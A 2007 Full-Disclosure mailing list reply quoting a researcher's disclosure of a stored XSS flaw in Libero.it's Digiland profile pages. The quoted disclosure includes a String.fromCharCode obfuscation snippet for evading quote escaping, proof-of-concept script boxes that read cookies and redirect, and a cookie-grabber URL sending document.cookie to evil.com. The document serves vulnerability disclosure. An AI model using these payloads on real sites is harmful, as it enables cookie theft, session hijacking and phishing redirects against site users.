Date: Thu, 29 Mar 2007 09:03:45 -0400
From: Kradorex Xeron <admin@...ibase.ca>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: Another XSS vulnerability in Italian provider Libero.it

They probably need to redo their entire site's scripts; I wouldn't doubt there's a few more exploits in there somewhere.

-- 2+ exploits within one site in one month is pretty sad.

On Wednesday 28 March 2007 12:17, LK wrote:
> After the report of Rosario Valotta on this ML, another XSS vulnerability
> has been found on Libero.it, one of the most important Italian ISPs
> (www.libero.it).
>
> Nothing more than a trivial error but, since Libero.it staff used the
> printed media to inform that Rosario's find was just a "spot" issue, it is
> important to demonstrate that this kind of error is considerably more
> widespread and to let the Libero staff and management realize that a
> potential attack must be avoided by a deep check of the portal.
>
> The vulnerability once again can be found in the "Community" section
> of the Libero portal, and the affected functionality is the profile
> creation and retrieval
>
> <http://digiland.libero.it/profilo.phtml?nick=XssForFun&top=1>.
>
> The implementation of this functionality allows the injection of
> malicious code in the profile, so that an attacker by visiting his/her
> profile can:
>
> 1) steal username (in cookie)
> 2) steal cookies
> 3) arbitrary redirection for phishing purposes
>
> The normal URL would be something linked like this:
>
> http://digiland.libero.it/profilo.phtml?nick=Nick&top=1
>
> where "Nick" is the name of the nick whose profile has been
> manipulated or crafted to add arbitrary code.
>
> This vulnerability closely resembles those in MySpace and other
> communities. So it's nothing really complicated and you can skip on
> from here ;)
>
> In admin pages (you need to be logged in, by creating a fake account) on page
>
> http://digiland.libero.it/profilo_add.php?nocache=1175076655
>
> there are two different fields named "I miei difetti:" (my defects)
> and "i miei pregi:" (my strong points) that accept arbitrary content.
>
> As stated by Rosario, the Libero.it web application performs a simple
> parsing of the posted content, so that quote and double-quote (' and ")
> chars are escaped by putting a \ before them (both using ASCII and URL
> encoding).
>
> While I already had Rosario's beautiful implementation of a simple
> evasion technique, I preferred to encode the single chars with an old
> snippet of mine.
> The aim of the snippet (I don't remember if I made it, stole it, stole
> only the main idea or where, sorry) is to transform a string into a
> series of char numbers to be used with a String.fromCharCode command.
> Due to the limitation in size, the function which creates the
> String.fromCharCode sequence is detached, and the ASCII value is
> decreased by 100 to limit the number of digits.
>
> This is the creation snippet:
>
> <script>
> var toBenc = "http://www.lastknight.com";
> var result = "";
>
> // emit one e(n) term per character, with n = charCode - 100
> for (var k = 0; k < toBenc.length; k++)
> {
>   result += ("e(" + (toBenc.charCodeAt(k) - 100) + ")+");
> }
>
> // note: the output ends with a trailing "+", trimmed by hand below
> document.write(result + "<br>")
> </script>
>
> So URL "http://www.lastknight.com" is rendered as:
>
> e(4)+e(16)+e(16)+e(12)+e(-42)+e(-53)+e(-53)+e(19)+e(19)
> +e(19)+e(-54)+e(8)+e(-3)+e(15)+e(16)+e(7)+e(10)+e(5)+e(3)
> +e(4)+e(16)+e(-54)+e(-1)+e(11)+e(9);
>
>
> Using the two boxes we can use the following code for a POC:
>
> [BOX 1]
> <script>
> function e(A) {
>   return String.fromCharCode(A + 100)
> }
> alert(document.cookie);
> </script>
>
> [BOX 2]
> <script>
> var k =
> e(4)+e(16)+e(16)+e(12)+e(-42)+e(-53)+e(-53)+e(19)+e(19)+e(19)+e(-54)+e(8);
> k +=
> e(-3)+e(15)+e(16)+e(7)+e(10)+e(5)+e(3)+e(4)+e(16)+e(-54)+e(-1)+e(11)+e(9);
> alert(k);
> window.location = k;
> </script>
>
> The posting url can be easily modified to an http grabber such as:
>
> <http://evil.com/grab?c="+encodeURI(document.cookie);>
>
> or (much more dangerous) to a phishing site.
>
> Session Riding and derived problems have not been tested but many Italian
> security experts are working on it.
>
> A POC url is available (until it gets deleted) here:
>
> <http://digiland.libero.it/profilo.phtml?nick=XssForFun&top=1>
>
> Just my 2 cents and thanks to:
>
> <Rosario Valotta> for the first report, upon which this is based
> <SharDick> for help in JS ;)
> <Vokda && Zen> for consultancy and typo-killing ;)
>
>
> Greetings,
>
> MgpF
>
>
> Permanent Url: <http://www.lastknight.com/libero-xss/>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/